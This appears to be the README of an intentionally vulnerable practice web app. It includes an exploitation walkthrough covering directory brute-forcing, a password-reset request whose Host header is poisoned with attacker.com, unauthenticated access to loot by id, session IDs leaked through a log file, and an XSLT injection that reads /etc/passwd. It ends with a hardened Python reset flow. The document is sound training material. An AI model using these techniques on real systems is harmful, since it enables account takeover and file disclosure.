This app is intentionally vulnerable!
- Simply run `docker-compose up` and visit http://localhost:80
- Install the Python dependencies: `pipenv shell` and `pipenv install`
- Run the Python API via `python3 app.py`
- Run Nginx via `docker run --name my-nginx -p 80:80 -v ./nginx.conf:/etc/nginx/nginx.conf:ro -d nginx`
- We run `gobuster dir -u http://localhost -w ./resources/wordlist.txt`
- Looking at the output, we find `/pirates` exposed
- We visit http://localhost/pirates and find http://localhost/pirates/treasure.txt
- Send a `POST` request like:

  ```http
  POST /reset-password HTTP/1.1
  Host: attacker.com
  Content-Length: 25

  {"email":"[email protected]"}
  ```

- Check out the 'Loot' functionality and realize that you can access any loot without authentication if you know its `id`
- Check out the `production.log` again and find the `id` of the `admin` user
- This is of course only god-level bad if we can take over an admin account... so that's what we're gonna do here
- First, we find the admin's `sessionId` in the `production.log` and then run commands
- Use the `Transform XML with XSLT` functionality: upload the file `./resources/injection-read-file.xslt` and observe that the `/etc/passwd` file is returned
- Realize that you can change another user's password if you provide their email address
- This means you can change any user's password
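A hardened version of the password-reset flow behind the two reset findings above (the `Host` header being trusted when the link is built, and an email address alone being accepted as proof of ownership), as an added example that is not part of this app's code. The origin, the host allowlist, the in-memory stores and the address alice@example.com are constructed for the example.

```python
import secrets
import time

# Constructed configuration: the origin used in reset links is fixed server-side and the
# accepted Host values form an allowlist, so a request carrying "Host: attacker.com"
# cannot steer the emailed link anywhere else.
CANONICAL_ORIGIN = "http://localhost"
ALLOWED_HOSTS = {"localhost", "localhost:80"}
TOKEN_TTL_SECONDS = 15 * 60

# Constructed in-memory stand-ins for the app's user table and a reset-token table.
USERS = {"alice@example.com": {"password": "old-secret"}}
RESET_TOKENS = {}  # token -> (email, expiry timestamp)


def _now(now):
    return time.time() if now is None else now


def host_is_allowed(host_header):
    """Only our own hostnames are accepted; anything else is refused outright."""
    return host_header is not None and host_header.strip().lower() in ALLOWED_HOSTS


def request_reset(email, host_header, now=None):
    """Step 1: mint a single-use token for the account and build the link from CANONICAL_ORIGIN.

    Returns the URL that would be emailed to the account owner, or None when the request
    is refused (bad Host header or unknown address; show the same generic message in both
    cases so that addresses cannot be enumerated).
    """
    if not host_is_allowed(host_header) or email not in USERS:
        return None
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[token] = (email, _now(now) + TOKEN_TTL_SECONDS)
    return f"{CANONICAL_ORIGIN}/reset-password?token={token}"


def complete_reset(token, new_password, now=None):
    """Step 2: the token, not a user-supplied email, decides whose password changes.

    The token is consumed on first use and rejected after TOKEN_TTL_SECONDS.
    """
    entry = RESET_TOKENS.pop(token, None)
    if entry is None:
        return False
    email, expiry = entry
    if _now(now) > expiry:
        return False
    USERS[email]["password"] = new_password
    return True
```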